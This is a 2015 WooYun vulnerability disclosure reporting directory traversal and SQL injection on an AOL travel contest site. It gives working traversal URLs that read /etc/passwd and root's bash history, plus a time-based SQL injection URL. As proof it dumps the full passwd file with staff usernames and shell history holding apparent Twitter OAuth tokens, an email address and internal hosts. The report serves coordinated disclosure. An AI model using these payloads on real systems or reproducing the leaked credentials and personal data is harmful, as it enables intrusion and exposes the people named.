当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096786

漏洞标题:Directory traversal(root) & SQL Injections on *.aol.com

相关厂商:aol.com

漏洞作者: lijiejie

提交时间:2015-02-11 14:35

修复时间:2015-03-28 14:36

公开时间:2015-03-28 14:36

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-11: 细节已通知厂商并且等待厂商处理中
2015-02-11: 厂商已经确认,细节仅向厂商公开
2015-02-21: 细节向核心白帽子及相关领域专家公开
2015-03-03: 细节向普通白帽子公开
2015-03-13: 细节向实习白帽子公开
2015-03-28: 细节向公众公开

简要描述:

Directory traversal(root) & SQL Injections on *.aol.com

详细说明:

Directory traversal:

http://contests.travel.aol.com/pages/aoltravelcontest/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc/passwd%2500.jpg
http://contests.travel.aol.com/pages/aoltravelcontest/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Froot%252F.bash_history%2500.jpg


/root/.bash_history is readable which means the user who init web server is root.
SQL Injection:

http://contests.travel.aol.com/contests/showcontest/sleep(60)

漏洞证明:

read /etc/passwd

root:x:0:0:root:/root:/bin/ksh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
apache:x:48:506:Apache:/var/www:/bin/false
urchin:x:49:49:Urchin:/usr/local/urchin:/bin/false
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rabbitmq:x:100:101:RabbitMQ messaging server:/var/lib/rabbitmq:/bin/bash
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
rack:x:501:501::/home/rack:/bin/bash
webadmin:x:502:506::/home/webadmin:/bin/bash
nagios:x:503:503::/home/nagios:/bin/bash
logstash:x:508:508::/usr/local/logstash:/bin/bash
dkim:x:511:514::/usr/local/dkimproxy:/bin/bash
submit:x:516:517::/home/submit:/bin/false
parents:x:534:534::/home/parents:/bin/false
systems:x:600:600::/home/systems:/bin/ksh
jrisner:x:601:601::/home/jrisner:/bin/bash
#vijeta:x:609:609::/home/vijeta:/bin/bash
priyanka:x:610:506::/home/priyanka:/bin/bash
nvishal:x:613:615::/home/nvishal:/bin/bash
praveen:x:614:504::/home/praveen:/bin/bash
cnikita:x:615:506::/home/cnikita:/bin/bash
amitabh:x:622:623::/home/amitabh:/bin/ksh
vamshi:x:624:625::/home/vamshi:/bin/bash
rnaresh:x:625:626::/home/rnaresh:/bin/bash
ahilash:x:626:627::/home/ahilash:/bin/bash
abhilash:x:627:628::/home/abhilash:/bin/bash
ssatish:x:629:504::/home/ssatish:/bin/bash
bharath:x:631:506::/home/bharath:/bin/bash
phani:x:632:632::/home/phani:/bin/bash
mandiv:x:633:506::/home/mandiv:/bin/bash
bramesh:x:634:634::/home/bramesh:/bin/bash
abhilashv:x:635:635::/home/abhilashv:/bin/bash
dpraskumar:x:636:506::/home/dpraskumar:/bin/bash
vramesh:x:637:637::/home/vramesh:/bin/bash
sanantoniofun:x:643:643::/home/sanantoniofun:/bin/false
firestone:x:644:644::/home/firestone:/bin/false
corona:x:645:645::/home/corona:/bin/false
spectacle:x:646:646::/home/spectacle:/bin/false
testproject:x:647:647::/home/testproject:/bin/false
jbl:x:649:649::/home/jbl:/bin/false
theplanetisyourplayground:x:650:650::/home/theplanetisyourplayground:/bin/false
coronasoccer:x:651:651::/home/coronasoccer:/bin/false
dhaval:x:653:504::/home/dhaval:/bin/bash
karthik:x:660:504::/home/karthik:/bin/bash
caterpillar:x:679:679::/home/caterpillar:/bin/false
harikrishna:x:638:504::/home/harikrishna:/bin/bash


part of /root/.bash_history

curl --request 'POST' 'https://stream.twitter.com/1.1/statuses/filter.json' --data 'track=twitter' --header 'Authorization: OAuth oauth_consumer_key="d8JyKzy79wRm8ux1EsPgfw", oauth_nonce="48952074a4990c8ed31401fbf754cfd4", oauth_signature="skLLUs%2Fnq3nhpgk5NQmTviepsHU%3D", oauth_signature_method="HMAC-SHA1", oauth_timestamp="1367919228", oauth_token="93573954-4BIJa8sv1qwAyKeuWXaNhF3QF92IUr8l1kNNM77ez", oauth_version="1.0"' --verbose > vivek
svn --username mandiv co https://mytrtcom.svn.cloudforge.com/mtt/votigo_utils/trunk/facebooklistener /var/www/votigo_utils/facebooklistener
/usr/bin/php /var/www/votigo_utils/tweetstream/monitor.twitter.process.pl --help
grep "yrobledo0916@gmail.com" maillog*
ssh mandiv@misc01.votigo.com
passwd mandiv

修复方案:

add filters

版权声明:转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-02-11 23:44

厂商回复:

最新状态:

暂无